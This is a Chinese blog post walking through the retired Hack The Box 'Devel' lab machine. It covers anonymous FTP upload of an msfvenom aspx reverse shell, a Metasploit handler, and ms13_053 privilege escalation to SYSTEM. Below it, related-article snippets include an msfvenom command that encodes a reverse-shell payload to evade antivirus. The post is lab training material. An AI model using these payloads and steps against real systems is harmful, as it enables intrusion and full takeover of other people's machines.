HTB Devel Metasploit msf提权windows机器入门姿势

最新推荐文章于 2022-02-08 23:17:41 发布
最新推荐文章于 2022-02-08 23:17:41 发布
阅读量316 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46128614/article/details/104073533
版权

在HTB中Devel算是入门级的简单机器,但是平时Linux的机器做得比较多windows的机器基本没接触过,做一下Devel也算是练习一下windows机器。
在这个靶机中,传马的方式是FTP匿名登录,上传了一个webshell,在实际环境中,上传webshell的方法多种多样,但是后面提权的手段以及msf的操作可以借鉴

nmap -sS -sV -A -T4 10.10.10.5
在这里插入图片描述
从nmap可以看到允许Anonymous用户登录ftp 密码随意
在这里插入图片描述
可以连上ftp

然后在80端口就这样一个网页
在这里插入图片描述
右击查看源码,发现了FTP文件里的同名图片
在这里插入图片描述
ftp和IIS在服务器应该在同一个目录 访问10.10.10.5/welcome.png验证一下
在这里插入图片描述
果然,那我们就可以使用ftp上传一个webshell到iis目录下
此处使用的是msf生成的反弹shell
使用msfvenom生成shell –h查看帮助
在这里插入图片描述
其中 -p -f -o 是需要的 还需另外输入LHOST和LPORT
–list format查看所有shell的形式
在这里插入图片描述
在这个服务器上是iis7.5 用的应该是aspx
–list payload 查看所有的payload
在这里插入图片描述
因为不确定是32位还是64位机器,所有payload里windows/meterpreter/reverse_tcp比较通用
然后生成shell
在这里插入图片描述
ftp上传
在这里插入图片描述
开启msfconsole
use expoit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
在这里插入图片描述
run 然后去浏览器访问这个网页
在这里插入图片描述
切回来shell已经弹回来了
(在meterpreter下敲background可以挂起这个session)
在这里插入图片描述
shell查看systeminfo
在这里插入图片描述
查看到这是一台win7,hotfix是 N/A 表示这台机器从来没有打过补丁,应该有很多漏洞
我们利用一个信息收集脚本
在这里插入图片描述
只需要把刚才的session填进去就好了
set session 1
在这里插入图片描述
在这里插入图片描述
经过测试这个提权脚本是可以用的
use windows/local/ms13_053_schlamperei
set session
run
ctrl+c
然后在重新设置一下lhost和一个新的lport
在这里插入图片描述
run
然后就成功拿到了system权限(我的截图怎么少了最后一张 自闭)

「已注销」
关注
HTB Devel[Hack The Box HTB靶场]writeup系列3
重新启程
02-01 2737
Retired Machines的第三台机器Devel 目录 0x00 靶机情况 0x01 端口扫描 0x02 ftp服务 0x03 上传payload 0x04 get webshell 0x05 提权 0x00 靶机情况 从靶机的情况来看,难度属于初级,基本上都是选择1、2、3分为主,操作系统是windows 0x01 端口扫描 看看靶机提供了哪些服务: roo...
HTB-Devel
TA不懒,但还没有添加简介
07-20 291
HTB-Devel
oscp——HTB——Devel
王嘟嘟的博客
05-19 382
0x00 前言 难度 入门1级 0x01 信息收集 这里可以看到开了21和80 扫一下21,由于我这里有一点问题,所以21得重新扫一下 0x02 21——Webshell 本来以为是通过80扫目录然后搞进去。。。但是最后扫了半天发现扫错了。 发现是通过21搞进去的。可以看到是匿名访问。所以直接使用ftp连接。这里可以看到ftp的目录可能是和web目录一致的 访问test.txt进行测试 这里使用msf生成一个aspx的马,然后直接put上传 msf监听,访问cs.aspx会弹回来一个shell
HTB1wfo5GVXXXXbnXFXX.PRXFXXXn.rar_Windows编程_WINDOWS__Windows编程_WINDOWS_
08-09
标题中的“HTB1wfo5GVXXXXbnXFXX.PRXFXXXn.rar”看起来像是一个被替换过部分字符的RAR压缩文件名,这通常是为了隐私保护或避免特殊字符。RAR是一种流行的压缩格式,用于打包多个文件或目录到一个单一的可下载文件中...
HTB靶场系列 Windows靶机 Optimum靶机
m0_57221101的博客
01-28 2570
勘探 依然是nmap扫描 nmap 10.10.10.8 Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-13 21:58 EST Nmap scan report for 10.10.10.8 Host is up (0.031s latency). Not shown: 65534 filtered ports PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1
HTB靶场系列 Windows靶机 Arctic靶机
m0_57221101的博客
01-30 2710
这台靶机设定的30秒响应速度真的让人绝望。正儿八经的每做一个动作就可以玩半天手机 勘探 nmap nmap -sS -p 1-65535 10.10.10.11 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-03 15:31 CST Nmap scan report for 10.10.10.11 Host is up (0.28s latency). Not shown: 65532 filtered ports PORT
靶场提权小全
m0_57221101的博客
02-08 3895
说是linux提权但在整理的时候不自主的把windows的内容也写了进去,结果变成了大杂烩,也不知道是好还是不好你 https://github.com/sagishahar/lpeworkshop Windows提权: ​FuzzySecurity | Windows Privilege Escalation Fundamentals ​https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalatio..
msf登陆Windows 2
weixin_38167847的博客
06-10 196
使用ms17_010(永恒之蓝)进行攻击登陆(XP) 加载模块 ​​​ 连接靶机 ​​​ 设置payload ​​​ 设置lhost(攻击主机IP) ​​​ exploit进行攻击登陆 转载于:https://www.cnblogs.com/qftm/p/10317192.html...
winserver2008/iis7缓冲区溢出提权0day
09-13
一个很NB的工具。适用于iis7/iis7.5。溢出提权。 webshell提权、本地提权居家、放火必备。
内网渗透--windows提权
hee_mee的博客
07-28 1154
zeroNIl
中间件漏洞 -- IIS
weixin_44769042的博客
11-07 2444
中间件漏洞记录--1 目录 1.解析漏洞 iis6.0 漏洞原理 漏洞复现 win2003+iis6.0 1> 文件夹解析漏洞 2> 扩展名解析漏洞 iis7.0/7.5 原理 漏洞复现 IIS7.5 + Fast-CGI 2.PUT漏洞 漏洞原理 漏洞复现win2003+iis6.0 1> 开始测试 3.短文件名 漏洞原理 漏洞复现 win2003+WebDAV+ASP.NET 1> 如果文件名长度 >= 9,就会产生短文件名 2&g.
[网络安全自学篇] 五十八.Windows安全缺陷利用之再看CVE-2019-0708及反弹shell防御措施
热门推荐
杨秀璋的专栏
03-12 1万+
很早之前,我分享过一篇名叫 “Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解” 的博客,主要采用Python代码让目标XP系统蓝屏,但写得不太完善。作者最近一直在学习Windows漏洞利用,包括Msfconsole渗透工具及shell获取,这里我们也回过头来继续分析CVE-2019-0708,利用RDP(EXP)和Metasploit工具反弹shell,并实现Win7远程桌面攻击。希望文章对您有所帮助~
msf生成win版免杀木马
weixin_40709439的博客
01-24 7172
参考一大佬的 在linux下生成一个反弹的msf的python脚本,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o /mo.py 查看下py的内容 将buf值全部替换成mo.py的,其他不用修改 from c...
[EXP]IIS全版本提权工具
weixin_30614109的博客
02-17 827
工具: iislpe.exe 编译: .net 3.5   全版本IIS提权工具,支持IIS应用池用户/网络服务用户/本地服务用户 原理: 通过NTLM重放将权限提升至SYSTEM权限,详情参考Potato。 用法: IIS Priviledge by k8gegeIIS APPPOOL / Network Service / Local ServiceUseage:ii...
利用msf实现反弹shell与提权(细节过程秒懂)
Naiisii的博客
01-13 6243
环境 攻击机:Kali ip:192.168.50.183 靶机:Win7(x64) 两者在同一个C段!!!! 生成payload 首先我们生成一个payload文件,如果靶机是64位的建议生成64位的payload,以免后续提权过程受阻 在线快速生成payload网站 这里的IP设置为KaliIP,端口不要与其他服务冲突 接下来我们需要把payload下载到靶机win7(如果有能者可以直接拖拽进靶机也可以) 把下载好的文件放至网页,由靶机win7通过访问网页下载 mv reverse.exe /var/
使用msf进行反弹shell+内网渗透
JSMaster01的博客
12-30 1万+
首先说明一点,反弹shell的前提是该主机能够执行我们的恶意命令 反弹shell的原理与灰鸽子的原理是相似的,就是在靶机上执行一个我们msf精心构造的客户端,使靶机主动回连我们攻击机的某个端口。下面开始说明使用msf进行反弹shell的过程。 一、反弹shell: 1.首先使用msf中的msfvenom模块生成一个被控端的客户端文件。这里以Windows 64位为例,具体命令如下:“msfveno...
使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程
D-river博客
10-11 9800
metasploit比较经典的使用实例,ms08-067 netapi
ROS双线HTB+PCQ流量控制指南
"ROS双线HTB+PCQ手册是一份详细的操作指南,主要针对ROS (RouterOS) 系统中的双线流量控制技术,包括HTB(Hierarchy Token Bucket)和PCQ(Priority Queue)。这份手册适用于ROS 3.30及4.x版本,旨在帮助用户理解和配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值